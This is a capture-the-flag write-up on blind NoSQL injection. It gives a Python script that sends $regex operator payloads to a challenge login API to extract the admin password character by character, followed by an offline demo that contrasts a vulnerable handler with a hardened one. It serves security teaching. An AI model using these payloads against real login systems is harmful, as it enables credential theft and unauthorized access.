Blind Trust

NOSQLi

description.txt
The database remembers everything... but whispers only to those who ask properly.

Homepage

NoSQLi

I first tried classic SQLi payloads, which of course failed; switching to NoSQL injection payloads gave partial success.

So we need to brute-force the admin password? Short answer: yes. Because the login accepts query operators in the JSON body, a $regex condition on the password field turns the response into a yes/no oracle, and the password can be recovered one character at a time by growing a ^prefix.

This Python script does the work:

bruteforce.py
import json
import re
import string
import requests
import urllib3
urllib3.disable_warnings()

username = "admin"
password = ""
u = "http://15.207.248.78:50020/api/login"
headers = {'content-type': 'application/json'}

def login_ok(regex):
    # One blind probe: does the admin password match this regex?
    # json.dumps keeps quotes/backslashes in the candidate from breaking the body.
    payload = json.dumps({"username": {"$eq": username}, "password": {"$regex": regex}})
    r = requests.post(u, data=payload, headers=headers, verify=False, allow_redirects=False)
    return 'OK' in r.text or r.status_code == 200

while True:
    for c in string.printable:
        if c.isspace():
            continue
        # re.escape makes regex metacharacters (* + . ? | $ ...) literal
        if login_ok("^%s" % re.escape(password + c)):
            password += c
            print("Found one more char : %s" % password)
            break
    else:
        break  # no character extended the prefix: we have the whole password
print("Password: %s" % password)

A trailing $$ still works because $ is a zero-width end-of-string assertion in the PCRE syntax that MongoDB's $regex uses: repeating it asserts the same position twice, so ^s3cr3tPass$$ matches exactly the same strings as ^s3cr3tPass$. Nothing is ignored or mishandled by the regex engine; the pattern simply still matches the real password, which is most likely s3cr3tPass.
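To show the whole mechanism offline, here is an added example that is not part of the original writeup or the challenge's code. It emulates the vulnerable handler (the parsed JSON body goes straight into the query, so {"$eq": ...} and {"$regex": ...} objects are accepted as conditions), a hardened handler that rejects anything but plain strings, and the prefix-extraction loop from the script above with proper termination and metacharacter escaping. The in-memory user list and the password s3cr3tPass are constructed for the demo, and Python's re module stands in for MongoDB's PCRE engine, which is why the ^...$$ check behaves the same way here.

```python
import json
import re
import string

# Constructed stand-in for the challenge's MongoDB users collection (assumed data).
USERS = [
    {"username": "admin", "password": "s3cr3tPass"},
    {"username": "guest", "password": "guest"},
]

def match_field(stored, cond):
    """Evaluate a MongoDB-style condition against a stored string.
    Only the operators the attack needs ($eq, $regex) are emulated."""
    if isinstance(cond, dict):
        if "$eq" in cond:
            return stored == cond["$eq"]
        if "$regex" in cond:
            return re.search(cond["$regex"], stored) is not None
        return False
    return stored == cond  # plain string: exact match

def vulnerable_login(body: str) -> bool:
    """Mock of the vulnerable handler: the JSON object is used as the query,
    so operator objects become conditions (this is the injection)."""
    req = json.loads(body)
    return any(match_field(u["username"], req.get("username")) and
               match_field(u["password"], req.get("password")) for u in USERS)

def safe_login(body: str) -> bool:
    """Hardened handler: type-check both fields before they reach the query,
    so an operator object can never be interpreted as a condition."""
    req = json.loads(body)
    username, password = req.get("username"), req.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return False
    return any(u["username"] == username and u["password"] == password for u in USERS)

def extract_password(login, username="admin", alphabet=string.printable):
    """Blind extraction: grow a prefix with ^prefix, confirm with ^prefix$.
    Candidates are re.escape'd, so passwords containing regex metacharacters
    are recovered instead of skipped. Returns None if the oracle does not leak."""
    password = ""
    while True:
        # Anchored full match succeeds only once the prefix is the whole password.
        if login(json.dumps({"username": {"$eq": username},
                             "password": {"$regex": "^%s$" % re.escape(password)}})):
            return password or None
        for c in alphabet:
            payload = json.dumps({"username": {"$eq": username},
                                  "password": {"$regex": "^%s" % re.escape(password + c)}})
            if login(payload):
                password += c
                break
        else:
            return None  # no character extends the prefix: nothing to learn

if __name__ == "__main__":
    print("vulnerable:", extract_password(vulnerable_login))  # s3cr3tPass
    print("hardened:  ", extract_password(safe_login))        # None
```

Run against vulnerable_login the loop recovers the password; against safe_login every probe is rejected before the query runs and the function returns None, which is the check a fix for this bug should pass.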

___________________heapbytes' still pwning.
